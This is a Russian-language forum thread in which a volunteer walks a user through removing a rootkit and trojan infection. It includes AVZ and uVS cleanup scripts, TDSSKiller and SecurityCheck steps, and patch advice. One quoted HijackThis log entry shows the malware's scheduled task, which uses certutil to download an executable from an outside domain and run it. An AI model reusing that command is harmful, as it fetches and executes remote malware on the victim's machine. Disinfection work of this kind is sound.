tuvumba Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 Недавно обнаружил на рабочем компе вирус, попытки вручную удалить не увенчались успехом. При буте в нормальном режиме снова всё возвращается. Kaspersky Virus Removal Tool находит Winmon.sys, windefender, csrss и прочие файлы. Логи прилагаю. CollectionLog-2021.07.21-12.09.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 Здравствуйте! Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): {Исправление в службах в реестре, значения ImagePath. Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями SafeZone.cc При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. } var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String; DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String; ImagePathStr, RootStr, SubRootStr, LangID: string; AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer; FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String; procedure CheckAndRestoreSection(Root: String); begin Inc(AllRoots); if RegKeyExistsEx('HKLM', Root) then RegKeyResetSecurity('HKLM', Root) else begin Inc(RootsRestored); RegKeyCreate('HKLM', Root); AddToLog(RegSectMsg + Root + RestMsg); end; end; procedure CheckAndRestoreSubSection; begin CheckAndRestoreSection(SubRootStr); end; procedure RestoredMsg(Root, Param: String); begin AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg); Inc(KeysRestored); end; procedure FixedMsg(Root, Param: String); begin AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg); Inc(KeysFixed); end; procedure RestoreStrParam(Root, Param, Value: String); begin RegKeyStrParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; procedure CheckAndRestoreStrParam(Root, Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then RestoreStrParam(Root, Param, Value); end; procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then begin RegKeyIntParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; end; procedure CheckAndRestoreMultiSZParam(Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, Param) then begin ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true); RestoredMsg(RootStr, Param); end; end; // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS' procedure ImagePathFix(Node, Srv: String); var RegStr: String; begin RegStr := 'SYSTEM\' + Node + '\Services\' + Srv; if RegKeyExistsEx('HKLM', RegStr) then begin Inc(AllKeys); RegKeyResetSecurity('HKLM', RegStr); RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr); FixedMsg(RegStr, 'ImagePath'); end; end; { Выполнение исправление всех ключей в ветках - 'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'} procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String); var FileServiceDll, CCSNumber: string; i : integer; begin if Srv = 'BITS' then FileServiceDll := FullPathSystem32 + 'qmgr.dll' else FileServiceDll := FullPathSystem32 + 'wuauserv.dll'; RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv; CheckAndRestoreSection(RootStr); CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText); CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText); CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem'); Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then RestoreStrParam(RootStr, 'ImagePath', ImagePathStr) else begin Dec(AllKeys); if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then for i:= 0 to 999 do begin if i > 0 then CCSNumber := FormatFloat('ControlSet000', i) else CCSNumber := 'CurrentControlSet'; ImagePathFix(CCSNumber, Srv); end; end; CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1); CheckAndRestoreIntParam(RootStr, 'Start', 2); CheckAndRestoreIntParam(RootStr, 'Type', 32); if Srv = 'BITS' then begin CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs'); CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ'); end; SubRootStr:= RootStr + '\Enum'; CheckAndRestoreSubSection; CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000'); CheckAndRestoreIntParam(SubRootStr, 'Count', 1); CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1); SubRootStr := RootStr + '\Security'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then begin RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00'); RestoredMsg(SubRootStr, 'Security'); end; SubRootStr:= RootStr + '\Parameters'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); RestoredMsg(SubRootStr, 'ServiceDll'); end else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); FixedMsg(SubRootStr, 'ServiceDll'); end end; { Главное выполнение } begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); QuarantineFile('C:\Windows\rss\csrss.exe', ''); QuarantineFile('C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe', ''); DeleteFile('C:\Windows\rss\csrss.exe', '64'); DeleteFile('C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe', '64'); ClearLog; ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg'); ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg'); LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); if LangID = '0419' then begin DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.'; DispayNameTextWuauServ := 'Автоматическое обновление'; DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.'; DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)'; AddToLog('Операционная система - русская'); FinishMsg := '–––– Восстановление завершено ––––'; RestoreMsg := 'Восстановлено разделов\параметров: '; FixMsg := 'Исправлено параметров: '; CheckMsg := 'Проверено разделов\параметров: '; RegSectMsg := 'Раздел реестра HKLM\'; ParamMsg := 'Параметр '; ParamValueMsg := 'Значение параметра '; InRegSectMsg := ' в разделе реестра HKLM\'; CorrectMsg := ' исправлено на оригинальное.'; RestMsg := ' восстановлен.'; end else if LangID = '0409' then begin DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.'; DispayNameTextWuauServ := 'Automatic Updates'; DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.'; DispayNameTextBITS := 'Background Intelligent Transfer Service'; AddToLog('Operation system - english'); FinishMsg := '–––– Restoration finished ––––'; RestoreMsg := 'Sections\parameters restored: '; FixMsg := 'Parameters corrected: '; CheckMsg := 'Sections\parameters checked: '; RegSectMsg := 'Registry section HKLM\'; ParamMsg := 'Parameter '; ParamValueMsg := 'Value of parameter '; InRegSectMsg := ' in registry section HKLM\'; CorrectMsg := ' corrected on original.'; RestMsg := ' restored.'; end; AddToLog(''); { Определение папки X:\Windows\System32\ } NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory'); ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs'; Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1); FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\'; AllRoots := 0; AllKeys := 0; RootsRestored := 0; KeysRestored := 0; KeysFixed := 0; CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS'); CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv'); AddToLog(''); AddToLog(FinishMsg); AddToLog(''); AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored)); AddToLog(FixMsg + IntToStr(KeysFixed)); AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys)); SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log'); DeleteSchedulerTask('csrss'); DeleteSchedulerTask('ScheduledUpdate'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HiddenSea','command', '64'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); RebootWindows(true); end. "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - MSConfig\startupreg: HiddenSea [command] = C:\Windows\rss\csrss.exe (HKCU) (2021/07/21) (file missing) O4 - MSConfig\startupreg: SpringSky [command] = C:\Windows\rss\csrss.exe (HKCU) (2021/07/21) (file missing) O22 - Task: (disabled) ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\User\AppData\Local\Temp\csrss\scheduled.exe /31340 O22 - Task: (disabled) csrss - C:\Windows\rss\csrss.exe (file missing) Для повторной диагностики запустите снова AutoLogger. + После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему сообщению. 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 (изменено) Сделал всё указанное. В HijackThis отсутствовали все строки, кроме первой упомянутой. CollectionLog-2021.07.21-13.24.zip Correct_wuauserv&BITS.log Изменено 21 июля, 2021 пользователем tuvumba Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 1 час назад, tuvumba сказал: Kaspersky Virus Removal Tool находит Папку C:\KVRT2020_Data\reports упакуйте в архив и прикрепите к следующему сообщению. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку; Запустите файл TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). Самостоятельно без указания консультанта ничего не удаляйте!!! После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. Прикрепите лог утилиты к своему следующему сообщению. По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\) Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.3.0.0.44_10.05.2020_13.39.01_log.txt 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 Готово, TDSSKiller определила действие Пропустить, просто нажал продолжить. Reports.zip TDSSKiller.3.1.0.28_21.07.2021_13.44.28_log.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования, Скачайте Universal Virus Sniffer (uVS). Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к сообщению в теме. Подробнее читайте в руководстве Как подготовить лог UVS. 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 (изменено) Дождался завершения работы обеих программ. Лог uVS прилагаю, но не могу найти куда AutorunsVTchecker сохранил логи. USER-PC_2021-07-21_13-55-43_v4.11.6.7z Изменено 21 июля, 2021 пользователем tuvumba Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 Он ничего не сохраняет. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена: ;uVS v4.11.6 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.1 v400c icsuspend zoo %SystemRoot%\WINDEFENDER.EXE addsgn 9252628A3E6AC1CCE02B7A4E334BDFFACE9A6C66196A8FE80FC583345791709756104849BDBB6158F0F26927471649FA7C049D75DEC433C2D1667F3E0707F900 8 Trojan.SpyBot.795 [DrWeb] 7 zoo %Sys32%\DRIVERS\WINMON.SYS addsgn BA652BBE5D3D04F1E7F4E63ABE8099FCCDEDB2F689B294ABCD480AF4DB8A557C6B94077761BC2FB7D47F48530E9F15DE7588A0F1B9FAF8A728C0BA2FC74EA98A 64 Rootkit.Win64.Agent.avo [Kaspersky] 7 zoo %Sys32%\DRIVERS\WINMONFS.SYS addsgn BA652BBE5D3D04F1E7F4E63ABE8099FCCD9DFCF689B294ABCD480AF4DB8A557C6B94077761BC33B7D47F48530E9D4C57C32017376613F9941FD57B025E2D2273 64 Rootkit.Win64.Agent.avn [Kaspersky] 7 zoo %Sys32%\DRIVERS\WINMONPROCESSMONITOR.SYS addsgn BA652BBE5D3D04F1E7F4E63ABE8099FCCD2D62F689B294ABCD480AF4DB8A557C6B94077761BC2FB7D47F48530E9F15DE7588A0F1B9FAF8A728E0DA2FC74EA98A 64 Rootkit.Win64.Agent.ayv [Kaspersky] 7 chklst delvir deltmp czoo restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена…" Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. После выполнения скрипта зайдите в папку, где распакована утилита uVS, найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2020-06-30_22-04-27.7z) Если архив отсутствует, то заархивруйте папку ZOO с паролем virus. Полученный архив отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. Подробнее читайте в этом руководстве. Соберите новый образ автозапуска uVS (AutorunsVTchcker уже запускать не нужно). 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 (изменено) После выполнения скрипта выскочили уведомления о попытке установить драйвера без подписи, скриншот прилагаю. USER-PC_2021-07-21_14-52-39_v4.11.6.7z Изменено 21 июля, 2021 пользователем Sandor Убрал карантин Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 Давайте-ка проверим уязвимые места: Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txtЕсли Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txtПрикрепите этот файл к своему следующему сообщению. Карантин отправьте почтой по инструкции. Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 Отправил Zoo на карантин Имя карантина: 2021.07.21_ZOO_2021-07-21_14-47-19_b08c02bb64f0a130a58789b7a9ef09a7.7z Лог SecurityCheck прилагаю. SecurityCheck.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 ------------------------------- [ Windows ] ------------------------------- Контроль учётных записей пользователя отключен (Уровень 1) ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ ------------------------------- [ HotFix ] -------------------------------- HotFix KB3177467 Внимание! Скачать обновления HotFix KB3125574 Внимание! Скачать обновления HotFix KB4012212 Внимание! Скачать обновления HotFix KB4499175 Внимание! Скачать обновления HotFix KB4474419 Внимание! Скачать обновления HotFix KB4490628 Внимание! Скачать обновления HotFix KB4539602 Внимание! Скачать обновления Включите UAC и установите все хотфиксы. Перезагрузите компьютер и соберите новый образ автозапуска uVS. Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 Хотфиксы скачал, но при попытке установки выскакивает ошибка 0х80070424, но служба "Защитник Windows" запущена. UAC включил. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 21 июля, 2021 Share Опубликовано 21 июля, 2021 В каком состоянии службы? Цитата Служба обновления Windows Фоновая интеллектуальная служба передачи Рабочая станция Если остановлены, пробуйте запустить. Ссылка на комментарий Поделиться на другие сайты More sharing options...
tuvumba Опубликовано 21 июля, 2021 Автор Share Опубликовано 21 июля, 2021 Фоновая интеллектуальная служба передачи и Рабочая станция запущены. Службы обновления Windows нет в списках служб. Центр обновления Windows выключен и при попытке включения сообщает "Центр обновлений Windows в настоящее время не может выполнить поиск обновлений, поскольку эта служба не запущена. Возможно, потребуется перезагрузить компьютер" Ссылка на комментарий Поделиться на другие сайты More sharing options...
От leqwes
Рекомендуемые сообщения